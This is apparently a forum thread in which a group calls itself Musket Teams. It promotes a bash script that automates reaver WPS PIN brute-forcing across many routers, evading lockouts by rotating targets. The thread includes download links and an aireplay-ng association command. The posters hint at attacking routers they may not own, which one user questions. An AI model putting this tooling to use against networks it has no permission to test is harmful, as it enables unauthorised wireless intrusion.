Musket Teams have been watching the growing resistance to reaver WPs pin harvesting. Some routers lock after x number of pin requests, while others simply stop responding to pin requests for some period of time. In cases where the router locked the WPS system, these routers many times unlock within the next 18 to 24 hours. Very few in our areas of operation remain permanently locked. Those routers that stopped responding to pin request but remained open, were found to accept pin requests again in a few minutes. Hence WPS pins could be collected from these routers but this would take allot of effort.

The problem therefore was not technical but administrative. Musket Teams were in the process of automating these processes when we discovered auto-reaver. This program could collect pins from a large number of targets and looked very promising at first. But after testing the program for a month we found that auto-reaver would hang on targets under several different circumstances even though the author had attempted to prevent the problem thru various bash methods. With auto-reaver off the map, we went back to writing a script with a new view of the problems and developed a very simple pin harvesting program primarily dependent on time.

The script file we call varmacreaverlocked18 was developed to slowly harvest pins from routers which either 1.lock their WPS systems after X number of pin requests or 2.stop responding to these pin requests but remain open. It employs the existing reaver program and should not be used if the router is open to WPS pin requests and is responding normally.The program requires a setup phase where the user enters the target APs and attack details of each target into a configuration txt file called maclistreaver. Once written the user simply runs the varmacreaverlocked.sh program, answers a few simple questions and the program works its way thru the target APs listed in the maclistreaver configuration file.

Varmacreaverlocked allows you to load up to 50 targets into the program thru the maclistreaver configuration file. We will add more target slots if users so rqr.
A user can set the -r x:y command thru the configuration file.
A long range weak RSSI feature has been added.
Special attack requirements for individual target APs could also be loaded into the reaver command lines manually if the user has some understanding of bash.

The reaver attack is time based. It cannot lock in a endless EAPOL hang on one target. When the program starts, it monitors the output of reaver. If a WPS locked state occurs or there is a failure to associate or reaver output is idle the script shuts down reaver and moves on to the next target. If the attack is active the script will allow the process to continue till the time as set by the user expires. We are constantly refining the coding driving this section of the script.
Each target has it own individual time element. You can attack target1 for 120 seconds then go to target2 and attack it for 300 seconds as per the configuration file.

New
Enclosed is an updated version of varmacreaversav called

varmascreaver992.sh. We have added the ability to adjust the maclistreaver configuration file while the program is running.

The ability of the program to sense when reaver pin harvesting has stoped has been improved.


Older versions are withdrawn

An updated version of varmacreaversav called varmascreaver993.sh is available for download.

A bug in the automatic removal of log files has been corrected

Older versions have been withdrawn

varmacreaversav99-3.zip contains:

1. varmacreaversav99-3.sh
2. varmacreaversav993-help.txt
3. maclistreaversav


You can down this update at

http://www.axifile.com/en/91AF3E59AD

WPS Special Tools is available at

http://www.axifile.com/en/DCA5819C59

MTA

Varmacreaverlocked18 has been updated to 19. See above for new download link

Musket Teams have updated the program to varmacreaversav.sh. . We have added the ability to save text files written to

screen and add known wps pins to the command line.


Older version are withdrawn. Upload varmacreaversav at:


http://www.axifile.com/en/83E5E4EACA

MTeams

Hi there!
Your script looks promising! I will try it for sure.

Just a quick question. What did you mean by that?

....In cases where the router locked the WPS system, these routers many times unlock within the next 18 to 24 hours. Very few in our areas of operation remain permanently locked. Those routers that stopped responding to pin request but remained open, were found to accept pin requests again in a few minutes....

Did you attack routers that you don't own?
Or those routers are in a testing environment that you own?

If this is the case then please refer to this:
https://forums.kali.org/showthread.php?8-Read-this-before-posting-%28Kali-Linux-forums-rules-and-guidelines%29


6. Ethical guidelines.
Any advice/information offered on these forums is to be used for the legal informational/professional/educational purposes for which it is intended.
We will not tolerate any questions pertaining to illegal activities. Any indication of illegal activities in your post will result in an immediate ban and deletion of your account from the forums.

It's well known that my English are terrible and pardon me in advanced if I understand wrong.

We have updated varmacreaversav to varmacreaversav992 available at

http://www.axifile.com/en/57D8CB36AF

Improvements include the ability to adjust the configuration file while the program is running.

Sensing that the reaver attack has stalled is also improved.


In closing we wish to quote Merlin and magic. To know their secret name it to own them. So if you know the WPS pin you own the router. Slowly cracking 11000 WPS pins is far better then trying to brute force a WPA handshake where the attack could stretch to decades.

An updated version of varmacreaversav called varmascreaversav99-3.sh is available for download.

A bug in the automatic removal of log files has been corrected.

Older versions have been withdrawn.


varmacreaversav99-3.zip contains:

1. varmacreaversav99-3.sh
2. varmacreaversav993-help.txt
3. maclistreaversav


You can download this update at

http://www.axifile.com/en/91AF3E59AD
-
MTB

Got it! Thank you. Will give it spin.

WPS Special Tools can be available at:

http://www.axifile.com/en/DCA5819C59

The updated script works great, at first. Because reaver is trying to associate itself to the AP, pin requests fail after the first loop. I tested this by using aireplay-ng to associate and reaver started moving along nicely. However, because everything gets restarted in the loop, including the wireless card, aireplay has to be restarted manually for your script to work.

If aireplay can be added so association can be passed through from reaver to aireplay then you script would fully automated.

We have run this script on three(3) different computers two(2) running kali 1-09 and one(1) running 1.07. The scripts ran unattended for two(2) days straight. We have been unable to duplicate this bug.

1. To be clear which script are you refering to?
2. Post the aireplay-ng command line that you used. Aireplay has -0 thru -9. We can add the aireplay-ng routine that you used into the script and send it to you no problem. We simply cannot test it as we are not seeing this.

MTeams

I am using the 006 version of your script.

The following aireplay command is currently being used:
aireplay-ng -1 60 -a bssid -e essid -q 10 mon0

Thanks

Scolder